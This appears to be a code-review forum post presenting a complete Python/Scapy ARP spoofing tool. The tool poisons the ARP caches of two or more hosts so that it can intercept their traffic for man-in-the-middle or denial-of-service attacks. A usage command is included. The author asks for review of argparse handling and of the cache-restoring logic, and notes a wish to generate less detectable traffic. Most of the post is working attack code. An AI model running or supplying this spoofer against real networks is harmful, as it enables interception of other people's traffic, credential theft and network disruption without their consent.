# ARP Spoofer to Set Up MitM and DOS attacks

Tags: python, python-3.x, networking

This code "poisons" the ARP cache of victim computers. Given the IP addresses of hosts A and B, it will trick A into thinking that you're B, and B into thinking that you're A. This means that all the traffic that they send to the other will actually be sent to you, and you can either consume that data (DOS), or forward it along to the intended recipient, and then also forward the response back (MitM).

Simple usage:

```
python arpspoof.py 192.168.123.1 192.168.123.111 -t 60 -b 3 -r
```

This will make it intercept traffic between `.1` and `.111`, will run for 60 seconds (`-t`), will send out the ARP bursts every 3 seconds (`-b`), and will attempt to "un-poison" each of the ARP caches when it's done (`-r`).

What I'd like commented on primarily:

- This is my first time ever touching `argparse`. If there's anything I can improve on with it's usage, I'd like to know. The main thorn in my side is I'd like to verify that there's *at least* two IPs supplied, but apparently `argparse`'s `narg` option doesn't allow that fine of control. I'd like to know if there's a better way than doing the manual `len` check after that I am.
- To reverse the poisoning, I'm sending a real ARP request to the victim to get their MAC address, then sending out an advertisement on their behalf. This has two issues though:

  - It requires sending/receiving an ARP request/reply, which is expensive.
  - It's extra traffic that's generated, which makes detection more likely.

---

`arpspoof.py`

```
import time
from typing import Iterable, List, Dict
from itertools import permutations
import argparse as ap

from scapy.arch import get_if_hwaddr
from scapy.config import conf
from scapy.layers.l2 import ARP
from scapy.sendrecv import send, sr

MAC_REQUEST_RETRIES = 3
MAC_REQUEST_TIMEOUT = 3


def _request_macs(target_ips: Iterable[str], verbose: bool = False) -> Dict[str, str]:
    reqs = ARP(pdst=list(target_ips), op="who-has")
    replies, _ = sr(reqs, retry=MAC_REQUEST_RETRIES, timeout=MAC_REQUEST_TIMEOUT, verbose=verbose)
    return {reply_stim[ARP].pdst: reply_resp[ARP].hwsrc
            for reply_stim, reply_resp in replies}


def _new_recovery_broadcast_arps(victim_ips: Iterable[str]) -> List[ARP]:
    """
    Attempts to create a packet to reverse the ARP Spoofing.
    If a MAC address can't be retrieved, it will be dropped.
    A very expensive function, as it carries out ARP-requests before the packets are constructed.
    """
    victim_macs = _request_macs(victim_ips)
    return [ARP(psrc=v_ip, pdst=v_ip, hwsrc=v_mac)
            for v_ip, v_mac in victim_macs.items()]


def _new_unsolicited_reply_redirect(victim_ip: str, redirect_from_ip: str) -> ARP:
    our_mac = get_if_hwaddr(conf.iface)
    return ARP(hwsrc=our_mac, psrc=redirect_from_ip, pdst=victim_ip, op="is-at")


def mass_arp_poison(victim_ips: Iterable[str],
                    burst_delay: int,
                    n_bursts: int,
                    verbose: bool = False
                    ) -> None:
    """
    Attempts to convince every host at the given addresses that we're each of the other computers.
    In the simplest form, victim_ips can be a tuple of (gateway_ip, victim_ip) to intercept a single computer's traffic.
    """
    packets = [_new_unsolicited_reply_redirect(v1, v2)
               for v1, v2 in permutations(victim_ips, 2)]
    for _ in range(n_bursts):
        send(packets, verbose=verbose)
        time.sleep(burst_delay)


def mass_reverse_arp_poisoning(victim_ips: Iterable[str], verbose: bool = False) -> None:
    """
    Attempts to reverse a previous ARP cache poisoning by advertising each victim's MAC.
    """
    packets = _new_recovery_broadcast_arps(victim_ips)
    send(packets, verbose=verbose)


def intercept_between(victim_ips: Iterable[str],
                      burst_delay: int,
                      n_bursts: int,
                      reverse_poisoning_after: bool = True,
                      verbose: bool = False
                      ) -> None:
    """
    Attempts to convince every host at the given addresses that we're each of the other computers.
    In the simplest form, victim_ips can be a tuple of (gateway_ip, victim_ip) to intercept a single computer's traffic.

    If reverse_reverse_poisoning_after, it will also attempt to reverse a previous ARP cache poisoning by
    advertising each victim's MAC.
    """
    try:
        mass_arp_poison(victim_ips, burst_delay, n_bursts, verbose)
    except KeyboardInterrupt:
        pass
    finally:
        if reverse_poisoning_after:
            mass_reverse_arp_poisoning(victim_ips, verbose)


def main():
    parser = ap.ArgumentParser()
    parser.add_argument("ips", nargs="+",
                        help="The IP addresses to redirect traffic from.")
    parser.add_argument("-r", "--recover_after", action="store_true",
                        help="Whether to attempt to reverse the ARP cache poisoning afterward.")
    parser.add_argument("-t", "--total_time", default=60, type=int,
                        help="The total amount of time in seconds to run for.")
    parser.add_argument("-b", "--burst_delay", default=3, type=int,
                        help="The delay in seconds between bursts of ARPs being sent out.")
    parser.add_argument("-v", "--verbose", action="store_true",
                        help="Whether Scapy's verbose output should be show for all operations.")
    args = parser.parse_args()

    if len(args.ips) < 2:
        print("At least two addresses should be specified.")
        return

    n_bursts = args.total_time // args.burst_delay
    intercept_between(args.ips, args.burst_delay, n_bursts, args.recover_after, args.verbose)


if __name__ == '__main__':
   main()
```